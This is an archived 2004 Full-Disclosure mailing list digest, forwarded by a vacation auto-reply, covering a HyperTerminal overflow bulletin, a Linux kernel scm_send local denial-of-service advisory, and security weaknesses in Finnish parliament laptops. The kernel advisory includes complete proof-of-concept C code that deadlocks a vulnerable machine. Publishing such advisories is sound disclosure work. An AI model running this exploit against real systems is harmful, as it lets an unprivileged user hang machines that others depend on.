Home page logo

fulldisclosure logo Full Disclosure mailing list archives

[Full-Disclosure] Re: Full-disclosure Digest, Vol 1, Issue 2116 (Vacation Auto-Reply)
From: "Harold Dahlstrom" <HDahlstrom () carollo com>
Date: Tue, 21 Dec 2004 22:56:26 -0700

I am out of the office - please contact Doug Hesser, Samuel Nichols, or Manuel Milke for technical issues or Dennis 
Guarrera for administrative issues.


full-disclosure 12/19/04 10:00 >>>

Send Full-Disclosure mailing list submissions to
        full-disclosure () lists netsys com

To subscribe or unsubscribe via the World Wide Web, visit
or, via email, send a message with subject or body 'help' to
        full-disclosure-request () lists netsys com

You can reach the person managing the list at
        full-disclosure-owner () lists netsys com

When replying, please edit your Subject line so it is more specific
than "Re: Contents of Full-Disclosure digest..."

Today's Topics:

   1. Re: HyperTerminal - Buffer Overflow In .ht File (Gregory Gilliss)
   2. [VulnDiscuss] Re: Linux kernel scm_send local DoS
      (even multiplexed)
   3. E-mail tracking finds murderess and baby in       kidnap-homicide
      case. (Tamas Feher)
   4. Re: Security breach database (Willem Koenings)
   5. Insecurity in Finnish parlament (computers) (Markus Jansson)


Message: 1
Date: Fri, 17 Dec 2004 10:38:23 -0800
From: Gregory Gilliss <ggilliss () netpublishing com>
Subject: Re: [Full-disclosure] HyperTerminal - Buffer Overflow In .ht
To: full-disclosure () lists netsys com
Message-ID: <20041217183823.GA20342 () netpublishing com>
Content-Type: text/plain; charset=us-ascii

great, so while I'm using hyperterminal on my network connected machine (!)
to update my hardware for the latest exploit, along comes someone with this
and hacks my client laptop. Somehow I'm glad that I only use UNIX...

-- Greg

On or about 2004.12.15 11:59:56 +0000, Brett Moore (brett.moore () security-assessment com) said:

= HyperTerminal - Buffer Overflow In .ht File
= MS Bulletin posted: 
= http://www.microsoft.com/technet/security/bulletin/MS04-043.mspx
= Affected Software:
=      Microsoft Windows NT Server 4.0 SP 6a 
=      Microsoft Windows NT Server 4.0 Terminal Server Edition SP6
=      Microsoft Windows 2000 SP4
=      Microsoft Windows XP SP2 
=      Microsoft Windows XP 64-Bit Edition SP1
=      Microsoft Windows XP 64-Bit Edition Version 2003 
=      Microsoft Windows Server 2003 
=      Microsoft Windows Server 2003 64-Bit Edition
= Public disclosure on December 15, 2004

Gregory A. Gilliss, CISSP                              E-mail: greg () gilliss com
Computer Security                             WWW: http://www.gilliss.com/greg/
PGP Key fingerprint 2F 0B 70 AE 5F 8E 71 7A 2D 86 52 BA B7 83 D9 B4 14 0E 8C A3


Message: 2
Date: Wed, 15 Dec 2004 04:23:22 +0100
From: even multiplexed <Shadow333 () gmx at>
Subject: [Full-disclosure] [VulnDiscuss] Re: Linux kernel scm_send
        local DoS
To: security () isec pl
Cc: vulnwatch () vulnwatch org, bugtraq () securityfocus com,
        full-disclosure () lists netsys com
Message-ID: <41BFAE2A.7040002 () gmx at>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed

Paul Starzetz wrote:

Hash: SHA1

Synopsis:  Linux kernel scm_send local DoS
Product:   Linux kernel
Version:   2.4 up to and including 2.4.28, 2.6 up to and including 2.6.9
Vendor:    http://www.kernel.org/
URL:       http://isec.pl/vulnerabilities/isec-0019-scm.txt
CVE:       CAN-2004-1016
Author:    Paul Starzetz <ihaquer () isec pl>
Date:      Dec 14, 2004


A  locally  exploitable  flaw  has been found in the Linux socket layer,
that allows a local user to hang a vulnerable machine.


The Linux kernel provides a powerful socket API  to  user  applications.
Among other functions sockets provide an universal way for IPC and user-
kernel communication. The socket layer uses several  logical  sublayers.
One  of  the  layers,  so called auxiliary message layer (or scm layer),
augments the socket API by  an  universal  user-kernel  message  passing
capability (see recvfrom(2) for more details on auxiliary messages).

One  of  the  scm  message  parsing  functions  invoked  from the kernel
sendmsg() code is __scm_send() and suffers from a deadlock condition  if
carefully  prepared  auxiliary  message(s)  is  sent  to  a socket by an
unprivileged application.

We believe that the 2.4 kernel branch is not  further  exploitable.  The
2.6  branch  has not been extensively checked, however it may be locally
exploitable to gain elevated privileges due to its increased complexity.


See attached code.


Unprivileged local users may hang a vulnerable Linux machine.


Paul  Starzetz  <ihaquer () isec pl>  has  identified the vulnerability and
performed further research. COPYING, DISTRIBUTION, AND  MODIFICATION  OF


This document and all the information it contains are provided "as  is",
for  educational  purposes  only,  without warranty of any kind, whether
express or implied.

The authors reserve the right not to be responsible for the  topicality,
correctness,  completeness  or  quality  of the information  provided in
this document. Liability claims regarding damage caused by  the  use  of
any  information  provided,  including  any kind of information which is
incomplete or incorrect, will therefore be rejected.


*     Linux kernel 2.4 & 2.6 __scm_send DoS
*     Warning! this code will hang your machine
*      gcc -O2 scmbang.c -o scmbang
*      Copyright (c) 2004  iSEC Security Research. All Rights Reserved.

#define _GNU_SOURCE
#include <stdio.h>
#include <errno.h>
#include <sys/socket.h>
#include <arpa/inet.h>

static char buf[1024];

fatal (const char *msg)
   printf ("\n");
   if (!errno)
        fprintf (stderr, "FATAL: %s\n", msg);
        perror (msg);
   printf ("\n");
   fflush (stdout);
   fflush (stderr);
   exit (1);

main (void)
   int s[2], r;
   struct sockaddr_in sin;
   struct msghdr *msg;
   struct cmsghdr *cmsg;

   r = socketpair (AF_UNIX, SOCK_DGRAM, 0, s);
   if (r < 0)
      fatal ("socketpair");

   memset (buf, 0, sizeof (buf));
   msg = (void *) buf;
   msg->msg_control = (void *) (msg + 1);

// make bad cmsgs
   cmsg = (void *) msg->msg_control;

   cmsg->cmsg_len = sizeof (*cmsg);
   cmsg->cmsg_level = 0xdeadbebe;
   cmsg->cmsg_type = 12;      // len after overflow on second msg

// -12 for deadlock
   cmsg->cmsg_len = -12;
   cmsg->cmsg_level = SOL_IP;
   msg->msg_controllen = (unsigned) (cmsg + 1) - (unsigned) msg->msg_control;
   r = sendmsg (s[0], msg, 0);
   if (r < 0)
      fatal ("sendmsg");

   printf ("\nYou lucky\n");
   fflush (stdout);

   return 0;

- -- 
Paul Starzetz
iSEC Security Research

Version: GnuPG v1.0.7 (GNU/Linux)



Dear Ladies and Gentleman

First of all thanks to mir Starzetz for bringing this bug to our 
attention.i just wanted to ask if anyone has a tip for me how to 
quickfix this bug, without actually rebuilding a patched version of the 
id be thankful for every tip.

i hope theres actually a way to do that, cause our customers wouldnt 
like that system of ours to reboot:/

Oliver Leitner


Message: 3
Date: Sat, 18 Dec 2004 21:13:24 +0100
From: "Tamas Feher" <etomcat () freemail hu>
Subject: [Full-disclosure] E-mail tracking finds murderess and baby in
        kidnap-homicide case.
To: full-disclosure () lists netsys com
Message-ID: <41C49D74.29818.C2BE56 () localhost>
Content-Type: text/plain; charset=US-ASCII

Not for the faint of heart.


BTW I love capital punishment!

Regards: Tamas Feher.


Message: 4
Date: Sun, 19 Dec 2004 00:04:06 +0200
From: Willem Koenings <infsec () gmail com>
Subject: Re: [Full-disclosure] Security breach database
To: full-disclosure () lists netsys com
Message-ID: <9b13f6c1041218140468012145 () mail gmail com>
Content-Type: text/plain; charset=US-ASCII

Looking for few interesting security breach stories...

Something to learn from :)




Message: 5
Date: Sun, 19 Dec 2004 03:19:38 +0200
From: Markus Jansson <markus.jansson () hushmail com>
Subject: [Full-disclosure] Insecurity in Finnish parlament (computers)
To: full-disclosure () lists netsys com
Message-ID: <41C4D72A.2010501 () hushmail com>
Content-Type: text/plain; charset=ISO-8859-15; format=flowed

Short version:

"The laptop computers used by members of parlament and their assistants 
in here Finland have severe security holes. These laptop computers dont 
have firewalls, file encryption and wiping tools, automatic update is 
not turned on, operating system (WindowsXP) is on its default settings 
for most, computers only support 802.11b WLAN which is insecure, etc. 
etc. As a bonus, they use TeliaSonera GSM:s which are totally insecure 
because they use COMP-128-1 and A5/1 for security. I contacted them 
months ago but they havent bothered to answer me, nor to reporters I 
have contacted later. Oh dear..."

Long version:

1. The computers do not have firewall, not even ICF enabled. Users 
cannot even enable it themselfes, since they dont have administrative 
permissions on the computers. Any remote-exploit vulnerability or bad 
passphrase and BUM! The computers is hacked.

2. The computers are mainly on default settings. They are WindowsXP. Do 
I really need to say more about this issue and what happens from it?

3. The computers have support for Bluetooth and it is enabled by 
default. This leaves many attack vectors inplace that are pretty 
numerous for me to tell you. Also, they have firewire enabled, which 
means that as in iPod:s case, anyone with such device can walk to one of 
these laptops and download everything inside it. Ouch.

4. Laptops have WLAN, but it only supports the totally insecure 802.11b 

5. Computers do not have any kind of encryption programs. All files and 
folders are unencrypted. Even the EFS is turned off. There is no way to 
secure personal or sensitive documents in the computer.

6. There are no wiping tools in the computers to wipe off sensitive or 
personal files from them.

7. Computers do not have "Clear pagefile on shutdown" enabled, meaning 
that sensitive data can be recovered from unwashed swapfile later on.

8. Users do not have administrator permissions on computer so they could 
install neccessary security programs to them. Ofcourse, there is the 
plus side that this *should* limit the damage to the systems 
to...well..the user (= the member of parlament or their assistants). Ouch.

9. There are VPN connections in the computers, but it is unclear are 
they protected against man-in-the-middle-attacks or not. My educated 
guess is that they arent, meaning again...

10. Its unclear are the computers set on "automatic updates" or not. My 
educated guess is that they arent, meaning again (especially if you look 
at the point 1 again)...ouch.

11. Default browser is Internet Explorer, with default settings 
ofcourse. Now, I dont have to tell you how serious security risk this 
is, especially if you concider point 10...

12. MEP:s etc. use TeliaSonera GSM:s. The security that TeliaSonera uses 
is COMP-128-1 and A5/1, which are all totally insecure and can easily be 
broken with a laptop computer etc. meaning that their conversations can 
easily be eavesdropped. They should use COMP-128-3 and A5/3 to make it 

13. At TeliaSonera GSM networks, there is no protection against 
"false-basestation" techique, which easy bypass of crypto by simply 
turning it off from the "basestation". For example, Elisa uses 
COMP-128-3 and A5/3 and does not allow phones to turn off crypto even 
basestation orders them to do so.

I have contacted about this issue months ago to security personel in our 
parlament. They havent even bothered to answer me, not to mention that 
they would have fixed the computers security problems. So, here is it, 
maybe they'll listen now.

My computer security & privacy related homepage
Use HushTools or GnuPG/PGP to encrypt any email
before sending it to me to protect our privacy.


Full-Disclosure mailing list
Full-Disclosure () lists netsys com

End of Full-Disclosure Digest, Vol 1, Issue 2116

Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

  By Date           By Thread  

Current thread:
  • [Full-Disclosure] Re: Full-disclosure Digest, Vol 1, Issue 2116 (Vacation Auto-Reply) Harold Dahlstrom (Dec 22)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]